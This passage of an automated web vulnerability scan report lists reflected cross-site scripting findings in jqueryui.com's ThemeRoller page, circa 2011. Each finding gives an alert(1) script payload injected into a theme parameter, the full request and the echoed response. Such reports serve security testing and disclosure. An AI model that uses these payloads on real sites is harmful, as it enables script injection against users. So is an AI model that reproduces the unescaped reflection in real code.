Date: Thu, 27 Jan 2011 19:14:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pngac7dc"><script>alert(1)</script>ced59be90ca&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerR
...[SNIP]...

3.38. http://jqueryui.com/themeroller/ [bgTextureShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa510"><script>alert(1)</script>0bdc0f1fe04 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.pngaa510"><script>alert(1)</script>0bdc0f1fe04&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.pngaa510"><script>alert(1)</script>0bdc0f1fe04&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.39. http://jqueryui.com/themeroller/ [borderColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83abc"><script>alert(1)</script>c8f0c5f0c21 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC83abc"><script>alert(1)</script>c8f0c5f0c21&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ghlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC83abc"><script>alert(1)</script>c8f0c5f0c21&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000
...[SNIP]...

3.40. http://jqueryui.com/themeroller/ [borderColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2458c"><script>alert(1)</script>1e2146c3dca was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC2458c"><script>alert(1)</script>1e2146c3dca&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
light_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC2458c"><script>alert(1)</script>1e2146c3dca&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorH
...[SNIP]...

3.41. http://jqueryui.com/themeroller/ [borderColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de03"><script>alert(1)</script>591a2eed492 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF1de03"><script>alert(1)</script>591a2eed492&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF1de03"><script>alert(1)</script>591a2eed492&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8
...[SNIP]...

3.42. http://jqueryui.com/themeroller/ [borderColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e98"><script>alert(1)</script>00c7bbe14b6 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B1000029e98"><script>alert(1)</script>00c7bbe14b6&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B1000029e98"><script>alert(1)</script>00c7bbe14b6&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&
...[SNIP]...

3.43. http://jqueryui.com/themeroller/ [borderColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6583"><script>alert(1)</script>bd50e49b25f was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDDc6583"><script>alert(1)</script>bd50e49b25f&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDDc6583"><script>alert(1)</script>bd50e49b25f&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AA
...[SNIP]...

3.44. http://jqueryui.com/themeroller/ [borderColorHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7663a"><script>alert(1)</script>6663ea94d2a was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9367663a"><script>alert(1)</script>6663ea94d2a&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
mgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9367663a"><script>alert(1)</script>6663ea94d2a&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgT
...[SNIP]...

3.45. http://jqueryui.com/themeroller/ [borderColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98ea6"><script>alert(1)</script>bc04b692349 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF98ea6"><script>alert(1)</script>bc04b692349&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF98ea6"><script>alert(1)</script>bc04b692349&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC
...[SNIP]...

3.46. http://jqueryui.com/themeroller/ [cornerRadius parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efcfe"><script>alert(1)</script>d490bc83fc4 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7pxefcfe"><script>alert(1)</script>d490bc83fc4&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
